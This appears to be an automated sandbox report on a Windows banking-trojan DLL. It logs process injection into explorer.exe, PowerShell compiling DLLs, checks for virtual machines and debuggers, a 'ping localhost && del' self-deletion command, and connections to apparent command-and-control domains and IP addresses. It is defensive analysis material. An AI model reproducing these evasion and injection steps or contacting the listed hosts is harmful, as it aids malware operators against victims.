    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt23bwkp.2ng.ps1Jump to behavior
    Source: classification engineClassification label: mal100.bank.troj.expl.evad.winDLL@27/18@3/5
    Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D31AB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_01
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{84B29C49-139C-5672-BDF8-F7EA41AC1BBE}
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
    Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{5CDEF802-0BE6-EE03-7550-6F0279841356}
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_01
    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: 7078612.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050DA34C push eax; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050DA344 push eax; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050DA350 push eax; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050DB352 pushfd ; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D825B push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D7E70 push ecx; ret
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E7C7BC push edi; iretd
    Source: 7078612.dllStatic PE information: real checksum: 0x872fe521 should be: 0x8a90a
    Source: ogaysol0.dll.19.drStatic PE information: real checksum: 0x0 should be: 0xd29b
    Source: bplkxjdz.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x45be
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ogaysol0.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bplkxjdz.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: Yara matchFile source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogaysol0.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bplkxjdz.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9685
    Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: explorer.exe, 00000017.00000000.682082141.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
    Source: explorer.exe, 00000017.00000000.682491990.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
    Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: RuntimeBroker.exe, 0000001C.00000002.877330831.0000020727667000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp|
    Source: explorer.exe, 00000017.00000000.675091139.0000000005F25000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
    Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.51 80
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.207.46.124 80
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: internetcoca.in
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: meganetwork.top
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.105.103.207 80
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.149.9 80
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: supernetwork.top
    Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7B4F912E0
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7B4F912E0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 286000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFE468F1580
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 23F0000
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 65130DC000
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580
    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 28C000
    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFE468F1580
    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 23E0000
    Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFE468F1580
    Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580 protect: page execute and read and write
